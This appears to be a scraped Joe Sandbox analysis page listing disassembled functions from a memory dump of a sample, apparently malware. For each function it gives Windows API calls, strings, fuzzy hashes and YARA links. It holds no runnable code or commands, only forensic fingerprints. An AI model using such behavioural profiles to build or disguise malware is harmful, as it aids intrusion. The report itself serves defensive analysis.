Instruction ID: 168743def08829b1859d95a23b7a38bf93698d4aaad21abebeb240c37efa6f61
Opcode Fuzzy Hash: 09fcc5ee278b05eccc5a37cb1dd0ec1d0da163acecf436616364c5049407a8b7
Instruction Fuzzy Hash: A4115672504209BBDF119FA8ED49FDE7BADEF48704F044124FA05A2060C3718EA1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00143382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00143379,00142FE5), ref: 00143390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0014339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001433B7
SetLastError.KERNEL32(00000000,?,00143379,00142FE5), ref: 00143409

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 118f4598b8c50682baa2e62b9e4ee6e33a6c0d6bcc9f0760373b660351c21d3d
Instruction ID: 551788a651cadb16bcecc34029af1f77e7eb3c861559d5c5c5163b45ec3e1f3a
Opcode Fuzzy Hash: 118f4598b8c50682baa2e62b9e4ee6e33a6c0d6bcc9f0760373b660351c21d3d
Instruction Fuzzy Hash: 6401F733609322BFA62D2BB5BCC5A6B2A95FB25B797200329F430892F1EF114F4255D4

Uniqueness

Uniqueness Score: -1.00%

Function 00152D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00155686,00163CD6,?,00000000,?,00155B6A,?,?,?,?,?,0014E6D1,?,001E8A48), ref: 00152D78
_free.LIBCMT ref: 00152DAB
_free.LIBCMT ref: 00152DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0014E6D1,?,001E8A48,00000010,00124F4A,?,?,00000000,00163CD6), ref: 00152DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0014E6D1,?,001E8A48,00000010,00124F4A,?,?,00000000,00163CD6), ref: 00152DEC
_abort.LIBCMT ref: 00152DF2

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d487ef9f0da557fa02d9ee6c202ba79e4945bd4d6096ab2aa0816d67924f9911
Instruction ID: 9337c56ef2aa6c71cbe90a6dffc808639f8d1ec89aa52903c2c2b7d8ae59fc2b
Opcode Fuzzy Hash: d487ef9f0da557fa02d9ee6c202ba79e4945bd4d6096ab2aa0816d67924f9911
Instruction Fuzzy Hash: 11F0A933504900EBC21227B4AC06E5E26A56BD37A7F254519FC349F5A2DF34884D5160

Uniqueness

Uniqueness Score: -1.00%

Function 001B8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00139639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00139693
Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396A2
Part of subcall function 00139639: BeginPath.GDI32(?), ref: 001396B9
Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001B8A4E
LineTo.GDI32(?,00000003,00000000), ref: 001B8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001B8A70
LineTo.GDI32(?,00000000,00000003), ref: 001B8A80
EndPath.GDI32(?), ref: 001B8A90
StrokePath.GDI32(?), ref: 001B8AA0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 4d303f2f4751aec18cc9795349b1738d067a59ed92d05da50c0b48798a01c9da
Instruction ID: 34f0b5ecad312be42cb8308c27158106fb280fe46036d4587764fd6b48f19a50
Opcode Fuzzy Hash: 4d303f2f4751aec18cc9795349b1738d067a59ed92d05da50c0b48798a01c9da
Instruction Fuzzy Hash: 30110576400109FFEB129F94DC88EAA7F6CEB08354F008122FA199A5A1C7719D95DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001851FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00185218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00185229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00185230
ReleaseDC.USER32(00000000,00000000), ref: 00185238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0018524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00185261

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 1a51070e2c25a82ba41a855245b7a47b42dce1a22db1be2e66eea00f8ae1ebba
Instruction ID: e60f429b0de3e0620968b3d898e1f76bf182af4ead430450b27772e664266c7e
Opcode Fuzzy Hash: 1a51070e2c25a82ba41a855245b7a47b42dce1a22db1be2e66eea00f8ae1ebba
Instruction Fuzzy Hash: 73014F75E00718BBEB10ABA99C49E5EBFB9EB48751F044165FA04A7681DB709900CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00121BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00121BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00121BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00121C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00121C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00121C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00121C22

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: f7fa99afa540318584738592845460d1d1720456c9720bad07fb83950a0570fe
Instruction ID: c2d10d6c4a4bd828490e005ced6cf4def69411299a923f21bed8b30d3adad884
Opcode Fuzzy Hash: f7fa99afa540318584738592845460d1d1720456c9720bad07fb83950a0570fe
Instruction Fuzzy Hash: A5016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0018EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0018EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0018EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0018EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0018EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0018EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0018EB75

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 22bb2606510fb3f0e0dd7ff8941899381f289decc3be9b97c9d9bf0a644475af
Instruction ID: c1f55aa60f80b3874e1ae0c994c3b65de55420d288b98c9e50fa13e776a29963
Opcode Fuzzy Hash: 22bb2606510fb3f0e0dd7ff8941899381f289decc3be9b97c9d9bf0a644475af
Instruction Fuzzy Hash: 5BF03A72240158BBE7215B629C0EEEF3B7CEFCAB11F000269FA01E1591E7A05A41CAF5

Uniqueness

Uniqueness Score: -1.00%

Function 00177439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00177452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00177469
GetWindowDC.USER32(?), ref: 00177475
GetPixel.GDI32(00000000,?,?), ref: 00177484
ReleaseDC.USER32(?,00000000), ref: 00177496
GetSysColor.USER32(00000005), ref: 001774B0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 55013c55806cff73275028477f73356bf5f89b29a019e48cdec02ad072d5fa5e
Instruction ID: ce8e6a0bf750ef71392e4d87b9828430ad65bd1dceb725d0d6c5edb70ed34583
Opcode Fuzzy Hash: 55013c55806cff73275028477f73356bf5f89b29a019e48cdec02ad072d5fa5e
Instruction Fuzzy Hash: 40014B31500215EFDB515F64DC08FEABBB6FB04321F514264F91AA25A1CB311E91EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00181874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0018187F
UnloadUserProfile.USERENV(?,?), ref: 0018188B
CloseHandle.KERNEL32(?), ref: 00181894
CloseHandle.KERNEL32(?), ref: 0018189C
GetProcessHeap.KERNEL32(00000000,?), ref: 001818A5
HeapFree.KERNEL32(00000000), ref: 001818AC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 778bb83862a01098b0e121196c22afb9e62a6ff815c21d2b728c560e0ca8c767
Instruction ID: 659058d27d524dab145342090e45db62944c081b09c0cb85a655aa2a60a4507f
Opcode Fuzzy Hash: 778bb83862a01098b0e121196c22afb9e62a6ff815c21d2b728c560e0ca8c767
Instruction Fuzzy Hash: 69E07576104505FBDB015FA5ED0C94ABF79FF49B22B508725F22591871CB3294A1DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0018C6EE
_wcslen.LIBCMT ref: 0018C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0018C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0018C7CA

Strings

0, xrefs: 0018C6AF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 952c20f780d584866677a8939266e80432d147f81bf6b4866d84596e722998fe
Instruction ID: 5e959b5e114ed4685241f509e2ce7969f96f09faf94bf2444f8b7e264d5c6e86
Opcode Fuzzy Hash: 952c20f780d584866677a8939266e80432d147f81bf6b4866d84596e722998fe
Instruction Fuzzy Hash: B051B1726143019BD714AF28D885B6B77E4AF59314F140A3DF995D32A0EB70DA44CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 001AAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 001AAEA3

Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625

GetProcessId.KERNEL32(00000000), ref: 001AAF38
CloseHandle.KERNEL32(00000000), ref: 001AAF67

Strings

@, xrefs: 001AAE72
<, xrefs: 001AAE6B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: e129cd57717c034a681e42fa92cd27122bb3b929c419ea26370807721d626452
Instruction ID: 50c6801a6dc29fda70a302e8e7c4a8ccb6e4a4dc029e58f6aa21d0f02c2cc206
Opcode Fuzzy Hash: e129cd57717c034a681e42fa92cd27122bb3b929c419ea26370807721d626452
Instruction Fuzzy Hash: AA71AD75A00229DFCB14DFA4D484A9EBBF0FF09310F448499E856AB3A2C774ED55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0018719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00187206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0018723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0018724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001872CF

Strings

DllGetClassObject, xrefs: 00187242

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: a16b8239df9c5d46e4759fbc1edb1591412d1b087c8e6a34f9987985219b8825
Instruction ID: bdf3c4dddbcf7d111452be0ddfbb10dfc779853fa177bc1d7a32c62e54eaab1c
Opcode Fuzzy Hash: a16b8239df9c5d46e4759fbc1edb1591412d1b087c8e6a34f9987985219b8825
Instruction Fuzzy Hash: 7F416171604204EFDB15DF94C884A9A7BAAEF44310F2580ADBD05AF29AD7B1DA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B3E35
IsMenu.USER32(?), ref: 001B3E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001B3E92
DrawMenuBar.USER32 ref: 001B3EA5

Strings

0, xrefs: 001B3D89

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 117e53a94864b2ee867d23f1af83409203153a3a63434b5473848ba5ad6f9b09
Instruction ID: 84a25df85878132cc9f898b0b9a6f7acf7b9295fb51e30a3f02389df2aae7859
Opcode Fuzzy Hash: 117e53a94864b2ee867d23f1af83409203153a3a63434b5473848ba5ad6f9b09
Instruction Fuzzy Hash: 57413A75A01209EFDB10DF50D884AEABBB5FF49354F04412AF915AB250D730EE65CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00181DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00181E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00181E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00181EA9

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

Strings

ListBox, xrefs: 00181E25
ComboBox, xrefs: 00181DF0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: b56a8fa345c12bf35eb2a41d3914fb3767754c837872e5d66815368a89abef43
Instruction ID: 571a4f7e4c7c4da3979b06cbc76dcaf9b2246036780552d044c1b6102a7d1775
Opcode Fuzzy Hash: b56a8fa345c12bf35eb2a41d3914fb3767754c837872e5d66815368a89abef43
Instruction Fuzzy Hash: C021F372A00108BADB19AB68EC45CFFB7BDEF55350F144129F825A72E1DB744A1A9B20

Uniqueness

Uniqueness Score: -1.00%

Function 001AC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001AC9F1
_wcslen.LIBCMT ref: 001ACA68
_wcslen.LIBCMT ref: 001ACA9E
_wcslen.LIBCMT ref: 001ACAF9
_wcslen.LIBCMT ref: 001ACB2F
_wcslen.LIBCMT ref: 001ACB7F

Strings

HKLM, xrefs: 001ACA98, 001ACA9D
HKEY_LOCAL_MACHINE, xrefs: 001ACA62, 001ACA67

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: 2082e093fb66590620f7bafc71e1e9276d25ed8ae5344e44c92f2a9b8c5b51b7
Instruction ID: a7423c48ab2e23928a52a7194574ace0a2b352fb31f55865f9a9a88d3ba965dd
Opcode Fuzzy Hash: 2082e093fb66590620f7bafc71e1e9276d25ed8ae5344e44c92f2a9b8c5b51b7
Instruction Fuzzy Hash: C031047BA0056E8BDB20DF6DD9401BE3391ABB7754B054029E845AB284FB70CE81D3E0

Uniqueness

Uniqueness Score: -1.00%

Function 001B2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001B2F8D
LoadLibraryW.KERNEL32(?), ref: 001B2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001B2FA9
DestroyWindow.USER32(?), ref: 001B2FB1

Strings

SysAnimate32, xrefs: 001B2F68

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 24135a5a52f74ae398adf0c1d0425efae8d000c8650bb23ead5728924af2825b
Instruction ID: 9a30b900fede6ad7fd1306e9d9bbe8b7a5b206036e2f0acb6fcdf0dc9f9d9b63
Opcode Fuzzy Hash: 24135a5a52f74ae398adf0c1d0425efae8d000c8650bb23ead5728924af2825b
Instruction Fuzzy Hash: BE218972204209ABEF108FA4DC84EFB77B9EB69364F10462CFA50D61A0D771DC9597A0

Uniqueness

Uniqueness Score: -1.00%

Function 00144D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00144D1E,001528E9,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002), ref: 00144D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00144DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00144D1E,001528E9,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002,00000000), ref: 00144DC3

Strings

mscoree.dll, xrefs: 00144D86
CorExitProcess, xrefs: 00144D98

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 051ac54638685bb241135184f4dc741910cd71665c93bbbdb81e545b05cc43e2
